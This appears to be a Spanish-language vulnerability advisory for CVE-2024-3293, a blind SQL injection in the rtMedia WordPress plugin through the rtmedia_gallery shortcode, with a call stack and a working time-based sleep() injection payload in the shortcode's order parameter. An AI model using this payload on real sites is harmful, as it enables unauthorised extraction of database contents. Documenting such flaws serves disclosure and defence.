
CVE-2024-3293 rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - Inyección SQL autenticada (Colaborador+) a través del shortcode rtmedia_gallery
rtMedia para WordPress, BuddyPress y bbPress <= 4.6.18 - Inyección SQL autenticada (Colaborador+) a través del shortcode rtmedia_gallery
Descripción
El plugin rtMedia para WordPress, BuddyPress y bbPress para WordPress es vulnerable a una inyección SQL ciega a través del shortcode rtmedia_gallery en todas las versiones hasta la 4.6.18 inclusive, debido a un escape insuficiente en el parámetro proporcionado por el usuario y a la falta de preparación suficiente en la consulta SQL existente. Esto permite que atacantes autenticados, con acceso de nivel colaborador o superior, añadan consultas SQL adicionales a las consultas ya existentes, que pueden ser utilizadas para extraer información sensible de la base de datos.
PILA DE LLAMADAS
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Payload:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Payload verdadero:

Payload falso:
